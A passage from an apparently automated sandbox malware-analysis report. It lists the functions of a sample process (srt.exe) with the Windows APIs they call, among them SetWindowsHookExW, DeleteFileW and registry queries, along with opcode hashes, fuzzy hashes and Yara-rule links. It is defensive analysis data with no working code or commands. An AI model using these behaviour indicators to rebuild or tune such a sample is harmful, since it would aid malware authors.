                                                                                            • Opcode Fuzzy Hash: e07e240e8d74f0da36f51ff437c39eb1c92c937ac4bce21bd0e4942926766c7b
                                                                                            • Instruction Fuzzy Hash: E6F0FF34500740DFEB20CF15D885765FBA0EF01B21F98C0AECC084B312D279A444CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0066A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 1a2fd34ead02106b20c21ac9e76fc20b558dc3f4bda5bb81fc2740261dba181c
                                                                                            • Instruction ID: b6b089db3870c51d70b1d8b56acc65d55a88287536b285c1323f2e5fb92cd40e
                                                                                            • Opcode Fuzzy Hash: 1a2fd34ead02106b20c21ac9e76fc20b558dc3f4bda5bb81fc2740261dba181c
                                                                                            • Instruction Fuzzy Hash: 38F02234404700CFEB20CF05D884765FBA1EF00320F18C09ACD09AB302D374A804CEA3
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 027C099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 54dbc76a7b8156c669cc361f170fb3940394bd28707512d4b773bde7a788017e
                                                                                            • Instruction ID: 75587ae7aebcc1c36043f7a7f7035ded11622fd76f75c7409ec92056d576097f
                                                                                            • Opcode Fuzzy Hash: 54dbc76a7b8156c669cc361f170fb3940394bd28707512d4b773bde7a788017e
                                                                                            • Instruction Fuzzy Hash: 0FF02D34804300CFEB20CF16D888B26FBA4EF01320F28C0AECC494B302D374A408CEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 0066AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: fb56c809c022740dcaca13dc78eabb5835f5a9c3d7f9cc9e6dcc23ebf667e117
                                                                                            • Instruction ID: 856e06c73bf1c2d9c0fc67c357f1bf3329eb82a3050c0c74b8958aac85ed4bac
                                                                                            • Opcode Fuzzy Hash: fb56c809c022740dcaca13dc78eabb5835f5a9c3d7f9cc9e6dcc23ebf667e117
                                                                                            • Instruction Fuzzy Hash: 2EF0CD31914740DFEB10CF86DA89761FBA0EF45721F58C09BDD095B742D279A904CEA3
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C063A, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE ref: 027C0640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: aecb19a50498e01a3fae21035c0e36087a7a1263db8dcb76eb8aa665f7dc6fea
                                                                                            • Instruction ID: 363994319fedf25e15a2540e7c245c9a1ec42c4130bbd808d5b82b885182253f
                                                                                            • Opcode Fuzzy Hash: aecb19a50498e01a3fae21035c0e36087a7a1263db8dcb76eb8aa665f7dc6fea
                                                                                            • Instruction Fuzzy Hash: 65E04F36604215CFEB109E29E8493A5B790EB41221F1440AEDC1AD7A60D675D598DA92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0066A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: cef5325ed9289cfd543ef66ff598cc235eef0d6c7b6db38c1e7b2c1a1fd61026
                                                                                            • Instruction ID: 2f08c9e52665f1af0d8cad8b952a43bfbcef49d5184ae2f12b71f287efe513a1
                                                                                            • Opcode Fuzzy Hash: cef5325ed9289cfd543ef66ff598cc235eef0d6c7b6db38c1e7b2c1a1fd61026
                                                                                            • Instruction Fuzzy Hash: 2D11A3715093809FD711CF65DC85B96FFA4DF42224F0984EBED45CB252D275A808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0066A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 32d070f9adf19e8096609563ae667faf34f52de8ebafd467c9e36e9e830fcad6
                                                                                            • Instruction ID: 88f2fda6cf947ac028fc0d7b8edf2de99b29aa7aaf74984b1c3d0f2e689e8001
                                                                                            • Opcode Fuzzy Hash: 32d070f9adf19e8096609563ae667faf34f52de8ebafd467c9e36e9e830fcad6
                                                                                            • Instruction Fuzzy Hash: 6A01DF71500640CFEB10DF55D8857A6FB94EF40324F18C4ABDC099B742D275A804CFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 006623F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147492999.0000000000662000.00000040.00000001.sdmp, Offset: 00662000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e949bce54f25fc3e262bf45f7c0422e0bb09ebec599a6ff5ec8acb396c68d61d
                                                                                            • Instruction ID: 49222e824d580f5b38dac1572a27e3ed0e1ebcddb7dcc0b47ec4a557baf3a217
                                                                                            • Opcode Fuzzy Hash: e949bce54f25fc3e262bf45f7c0422e0bb09ebec599a6ff5ec8acb396c68d61d
                                                                                            • Instruction Fuzzy Hash: F8D05E79204A828FD7168A1CC1A8BA537D5AF56B04F4644F9E840CB7A3CB68E9D1D201
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 006623BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147492999.0000000000662000.00000040.00000001.sdmp, Offset: 00662000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8195dfcc3226460a8b13a7f7a93e5d37839b1cac91d56ebf44020869360ebe42
                                                                                            • Instruction ID: 86e3eeba8cd3dd8169f4c4ac129bf5b234d577f78dae36cce5c27058379510ae
                                                                                            • Opcode Fuzzy Hash: 8195dfcc3226460a8b13a7f7a93e5d37839b1cac91d56ebf44020869360ebe42
                                                                                            • Instruction Fuzzy Hash: C4D05E34300A828FDB15CB1CC1A4F9973E5AF40700F0644E9BC408B366C3A8EC80C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: srt.exe PID: 3016 Parent PID: 1696 srt.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0036A3C6, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 976COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A40B
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: ee1b63b0dce6295280326e549791918b2685348e34d34fb6d7ff481dab51d6dc
                                                                                            • Instruction ID: 1fb3bca916aafef85b20d81571c3788aacfde3b6db341fb8c1ecad27c6b300db
                                                                                            • Opcode Fuzzy Hash: ee1b63b0dce6295280326e549791918b2685348e34d34fb6d7ff481dab51d6dc
                                                                                            • Instruction Fuzzy Hash: E6A24AB4A04228CFCB65EF24C854A9DB7BABF88305F1189E9D609A7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A3E7, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 632COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A40B
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: 3a38137e1b7fa4ad2f5c9b8c033ad8a4a15492bedcf03d293c6bdf68755893bb
                                                                                            • Instruction ID: 43d5d1c56892a28f32278923ec8798f1ac19d88326f2025e0ba0ac1c613ce380
                                                                                            • Opcode Fuzzy Hash: 3a38137e1b7fa4ad2f5c9b8c033ad8a4a15492bedcf03d293c6bdf68755893bb
                                                                                            • Instruction Fuzzy Hash: BF5226B4A04229CFCB65DF24C85469CB7BABF88305F2189E9D60AA7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A42C, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 625COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: cf34c12d9add9dcfa706e26367af25be1d459faffe707eca56f7494bc175fb4f
                                                                                            • Instruction ID: bdfb111c57e23abc00df86443b1c67cdda5129eba8ff26b4ea69ebf523db9c60
                                                                                            • Opcode Fuzzy Hash: cf34c12d9add9dcfa706e26367af25be1d459faffe707eca56f7494bc175fb4f
                                                                                            • Instruction Fuzzy Hash: 485227B4A04229CFCB65DF24C85469CB7BABF88305F2189E9D60AA7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A471, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 616COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: a7cae27efef819340adc916dc965b47431cbff6f7fc25f8bab71659f75be83a0
                                                                                            • Instruction ID: 8d925208a703910dbe1c3a132e4fc21de8c717c24c4881c3d6bab0996cc68c25
                                                                                            • Opcode Fuzzy Hash: a7cae27efef819340adc916dc965b47431cbff6f7fc25f8bab71659f75be83a0
                                                                                            • Instruction Fuzzy Hash: 235227B4A04229CFCB65DF24C85469CB7BABF88305F1189E9D60AA7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A4AD, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 611COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: f20db60c469f09909eebb82cde9a024f0678426e1788b3f234f2a1f14960a7e3
                                                                                            • Instruction ID: 402d69129dddf08fea9a5bd004e0a9190442902f6745ae3e9b030a48937f9bea
                                                                                            • Opcode Fuzzy Hash: f20db60c469f09909eebb82cde9a024f0678426e1788b3f234f2a1f14960a7e3
                                                                                            • Instruction Fuzzy Hash: AE5227B4A04229CFCB65DF24C85469CB7BABF88305F2189E9D60AA7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A4F2, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 604COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: 7d4d59957c7faccdb88570f7d075df4e64863e644156cc077f58134467dd4a28
                                                                                            • Instruction ID: d2e109de0bc49d640ebc9095cf8470f4d64f18112c1dde5acd78f258160ff715
                                                                                            • Opcode Fuzzy Hash: 7d4d59957c7faccdb88570f7d075df4e64863e644156cc077f58134467dd4a28
                                                                                            • Instruction Fuzzy Hash: 975227B4A04229CFCB25DF64C85469CB7BABF88305F2089E9D60AA7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A537, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 597COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: f5983247780b0e06b9eeb68048dcc144d55b8bf07619160e8dcd4bad30308aab
                                                                                            • Instruction ID: a4ec7048e3e5190b21a7f27d33d287110e4e7701941742a234a48c44e4e9c81e
                                                                                            • Opcode Fuzzy Hash: f5983247780b0e06b9eeb68048dcc144d55b8bf07619160e8dcd4bad30308aab
                                                                                            • Instruction Fuzzy Hash: 9B5227B4A04229CFCB65DF24C85469DB7BABF88305F1089E9D609A7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A57C, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 590COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: 5b023a03a6bf2d1bcb1cf695efb6c16e9fc867903e326a1761ad58ec8e936ad0
                                                                                            • Instruction ID: a00b1fd42d2851ddda498f8445c803d9acc2dc8cf600b3726904e06bef6aaa13
                                                                                            • Opcode Fuzzy Hash: 5b023a03a6bf2d1bcb1cf695efb6c16e9fc867903e326a1761ad58ec8e936ad0
                                                                                            • Instruction Fuzzy Hash: 915226B4A04229CFCB25EF64C85469DB7BABF88305F1089E9D60AA7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A5C1, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 583COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: 22aaea63ce90ddd9383aa081133569dcad8bba762f73de4daf9a7c9c1aa8a4e1
                                                                                            • Instruction ID: ac10e3f1b3d545ba3efc628437e7f83c40e13afc62e564d2304718ad02a017ae
                                                                                            • Opcode Fuzzy Hash: 22aaea63ce90ddd9383aa081133569dcad8bba762f73de4daf9a7c9c1aa8a4e1
                                                                                            • Instruction Fuzzy Hash: 724226B4A04229CFCB25EF64C85469DB7BABF88305F2089E9D609A7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A606, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 576COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: 15f8de978a0b6f9e86f0b7a8896cf9d1b2c1ae1049ccf001a7a2c6b46820f62f
                                                                                            • Instruction ID: ef5213cc6d37d37677b48252d209ef42af2dfce10198de690980807d9204ac28
                                                                                            • Opcode Fuzzy Hash: 15f8de978a0b6f9e86f0b7a8896cf9d1b2c1ae1049ccf001a7a2c6b46820f62f
                                                                                            • Instruction Fuzzy Hash: 0E4226B4A04229CFCB25AF64C85469DB7BABF88305F2089E9D609A7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A64B, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 569COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: 11d91aaae5b3b7bf9dd3d643c7fa31eebc9b083508e84a51382beede5580a9fc
                                                                                            • Instruction ID: 6fa876ccfe8c282253da2ebf5acb365b19ad6bdf90982fd1520efe32fe1a66d8
                                                                                            • Opcode Fuzzy Hash: 11d91aaae5b3b7bf9dd3d643c7fa31eebc9b083508e84a51382beede5580a9fc
                                                                                            • Instruction Fuzzy Hash: B94237B4A04229CFCB25EF64C85469DB7BABF88305F1089A9D609E7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0036A690, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 562COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0036A6B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID: !b$!b
                                                                                            • API String ID: 6842923-2707693505
                                                                                            • Opcode ID: 65d164a7e1eb8bffabf39ced05106a4496fcb8dae41b2c26dbc1d9fec1114c57
                                                                                            • Instruction ID: 59376c19fc73021c288b302a2690387a2b61434cfe650efd2b66e51c5b6ad18b
                                                                                            • Opcode Fuzzy Hash: 65d164a7e1eb8bffabf39ced05106a4496fcb8dae41b2c26dbc1d9fec1114c57
                                                                                            • Instruction Fuzzy Hash: 8E4227B4A04229CFCB25EF64C85469DB7BABF88305F1089A9D60AE7354CF349E85CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00B27960, Relevance: 1.8, APIs: 1, Instructions: 335registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00B27C09
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2353023296.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: 66dbbce5bbf237dd9cf82b8858f6c40356bfa32a175ec797bcffebe2ee0ac74f
                                                                                            • Instruction ID: 3e85a8ec55bcdc5602f7b098467e4ba657b4de796a7aee706d4edcbf64885478
                                                                                            • Opcode Fuzzy Hash: 66dbbce5bbf237dd9cf82b8858f6c40356bfa32a175ec797bcffebe2ee0ac74f
                                                                                            • Instruction Fuzzy Hash: AD41F2B1D042589FCB10CFA9D884ADEFFF5EF48300F65815AE818AB210DB759905CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00366D78, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00366E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351856608.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DeleteFile
                                                                                            • String ID:
                                                                                            • API String ID: 4033686569-0
                                                                                            • Opcode ID: 3cde3d52b674314f39ad8e101cfd68be3ecedb7ba0ae31e7033c37acb86ce3e5
                                                                                            • Instruction ID: 35c78bc9a9025b7958bf27f9e7ba65fe172c82b86102e3e7fc6e00b28bedbef2
                                                                                            • Opcode Fuzzy Hash: 3cde3d52b674314f39ad8e101cfd68be3ecedb7ba0ae31e7033c37acb86ce3e5
                                                                                            • Instruction Fuzzy Hash: CC31BA75E002098FCB00CFA9C805BEEFBF8EF89314F15C56AD818A7240D778A905CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00B27B50, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00B27C09
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2353023296.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: 28ce44e60f650916767f1613bc7609f7a61c961c306ebdeb04e0bce94ac13fd4
                                                                                            • Instruction ID: 472c16a1e1f4313d91a72551e90df5cfb4ac65387418daf48970ab5e9338107b
                                                                                            • Opcode Fuzzy Hash: 28ce44e60f650916767f1613bc7609f7a61c961c306ebdeb04e0bce94ac13fd4
                                                                                            • Instruction Fuzzy Hash: 8B31F1B1D002589FCB10CFA9D884ACEFBF5EF48300F65846AE819AB310DB749905CF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04784728, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 047847A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2358265249.0000000004780000.00000040.00000001.sdmp, Offset: 04780000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: HookWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2559412058-0
                                                                                            • Opcode ID: df4879c053d45a019247bc995285b3ee6ee8f55ecfef34db9b40a41a339e32e0
                                                                                            • Instruction ID: 8bbdd7108800f0990d934e9fe257d0b338b6493acd6e8252a4c6fcd13244bb92
                                                                                            • Opcode Fuzzy Hash: df4879c053d45a019247bc995285b3ee6ee8f55ecfef34db9b40a41a339e32e0
                                                                                            • Instruction Fuzzy Hash: 452124B59042099FDB14CF99C844BEEFBF9FB89314F10842AE459A7250D7B4AA40CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000BD48C, Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351227843.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b91b265a080fea69349f41b8e45fb916dfe819b53c306d96867b7cd0c02d608e
                                                                                            • Instruction ID: 8e98476c46bab1792101321c33ee4242358c9e0aa1ec29076a012deb0e8a7601
                                                                                            • Opcode Fuzzy Hash: b91b265a080fea69349f41b8e45fb916dfe819b53c306d96867b7cd0c02d608e
                                                                                            • Instruction Fuzzy Hash: 0C212875504604DFCB25DF10D8C0B9BFFA6FB94328F24856AD8050B206D336D846CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000BD578, Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351227843.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07e0e87af56dc92bc6189c3c12510dff5325dcacd0553b4d8cee6900651512f1
                                                                                            • Instruction ID: c39bad2f8397e35003d743c9cbdc3fac38e3a954a11a0325c5ed560d66229a20
                                                                                            • Opcode Fuzzy Hash: 07e0e87af56dc92bc6189c3c12510dff5325dcacd0553b4d8cee6900651512f1
                                                                                            • Instruction Fuzzy Hash: E5213775504204DFCB25CF54D9C0B9AFFA5FB98328F34856AE8094B246D336D846CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000CD01C, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351262661.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2661cc41c1829b58f5dad1811daf85e2fc0bcb872ea60b43772948e9d8297e8f
                                                                                            • Instruction ID: 01e0e621e252935eca2479c7303868fba65a3d121182c0cdf6f68219334220d4
                                                                                            • Opcode Fuzzy Hash: 2661cc41c1829b58f5dad1811daf85e2fc0bcb872ea60b43772948e9d8297e8f
                                                                                            • Instruction Fuzzy Hash: F521D375604204DFCB24CF58D884F1ABBA5EB84314F34C97ED9494B246C336D807CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000CE674, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000018.00000002.2351262661.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4ffc6b2213e5788f86f07f0ef213a27a1bb48fd1593843466e4dc214caebad85
                                                                                            • Instruction ID: 6afdcb4d315754f511fd403187cadd6ca622e39380d1105aa77bb3138e77f6af
                                                                                            • Opcode Fuzzy Hash: 4ffc6b2213e5788f86f07f0ef213a27a1bb48fd1593843466e4dc214caebad85
